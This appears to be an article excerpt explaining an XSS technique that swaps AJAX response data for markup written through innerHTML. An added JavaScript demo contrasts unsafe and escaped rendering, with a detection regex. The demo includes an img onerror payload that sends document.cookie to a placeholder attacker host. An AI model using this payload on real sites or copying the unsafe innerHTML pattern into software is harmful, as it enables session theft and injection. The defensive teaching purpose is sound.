As browser security has become more sophisticated, so have the cross-site scripting (XSS) techniques needed to get past it.
Basic attacks, such as simple data exfiltration or triggering an alert box, are likely to be spotted by developers during testing and blocked in production code.
This article highlights some advanced methodologies that are less likely to be blocked, notably “The InnerHTML Trap”, so called because it abuses the innerHTML property of DOM elements.
The technique works by intercepting an AJAX call and replacing the requested data with a malicious payload; the page then writes that data into the DOM as HTML through innerHTML, and the payload runs. Note that a script element inserted through innerHTML is not executed by browsers, so payloads of this kind rely on markup that fires on its own, such as an img tag with an onerror handler.
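The data flow just described, modelled in plain Node.js as an added example (this is not the article's own Python code). The transport functions stand in for fetch/XMLHttpRequest: the honest one returns the real API data, the hijacked one returns attacker-controlled data. The API path, field name, hostname and payload are all constructed for illustration.

```javascript
// Added example, not from the article: the "InnerHTML Trap" data flow.
// An attacker who controls the body of an AJAX response (compromised API,
// on-path position, poisoned cache) gets their markup written into the page
// when the client does `el.innerHTML = ...` with the response data.

// Escape the five characters that matter when text is placed into HTML.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Constructed sample of the honest server response.
const LEGIT_PROFILE = { displayName: 'Alice <alice@example.com>' };

// Constructed attacker payload substituted for the real data. A bare <script>
// element inserted via innerHTML is not executed by browsers, so the payload
// uses an <img> whose onerror handler fires as soon as the broken image loads.
// attacker.example is a placeholder hostname.
const INJECTED_PROFILE = {
  displayName:
    '<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">',
};

// Vulnerable rendering: API data is concatenated straight into markup, which
// is exactly what `el.innerHTML = \`<h2>Welcome, ${data.displayName}</h2>\`` does.
function renderUnsafe(profile) {
  return `<h2>Welcome, ${profile.displayName}</h2>`;
}

// Hardened rendering: same markup, but every untrusted field is escaped before
// it reaches the HTML sink. (In real DOM code, prefer el.textContent = data.)
function renderSafe(profile) {
  return `<h2>Welcome, ${escapeHtml(profile.displayName)}</h2>`;
}

// Crude check for active content: a tag carrying an on* handler attribute,
// a script tag, or a javascript: URL. Only matches inside a real tag, so
// escaped text such as "&lt;img ... onerror=" does not trigger it.
const ACTIVE_CONTENT = /<[a-z][^>]*\son[a-z]+\s*=|<script\b|javascript:/i;
function containsActiveContent(html) {
  return ACTIVE_CONTENT.test(html);
}

// Simulated AJAX layer: `transport(url)` resolves to the raw response body.
async function loadProfile(transport, render) {
  const body = await transport('/api/profile'); // path is illustrative
  return render(JSON.parse(body));
}
const honestTransport = async () => JSON.stringify(LEGIT_PROFILE);
const hijackedTransport = async () => JSON.stringify(INJECTED_PROFILE);

async function demo() {
  for (const [label, transport] of [['honest', honestTransport], ['hijacked', hijackedTransport]]) {
    const unsafe = await loadProfile(transport, renderUnsafe);
    const safe = await loadProfile(transport, renderSafe);
    console.log(`${label} response, innerHTML sink: ${unsafe}`);
    console.log(`  active content present: ${containsActiveContent(unsafe)}`);
    console.log(`${label} response, escaped:       ${safe}`);
    console.log(`  active content present: ${containsActiveContent(safe)}`);
  }
}

demo().catch((e) => { console.error(e); process.exitCode = 1; });
```

Running the script shows that the honest response renders identically either way apart from the escaped angle brackets in the e-mail address, while the hijacked response produces a live onerror handler only through the unescaped path. The check function is a test aid, not a defence: the fix is to keep untrusted data out of HTML sinks (textContent, or escaping when markup must be assembled as a string), not to filter the response.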
The article includes a short piece of Python code which illustrates this technique.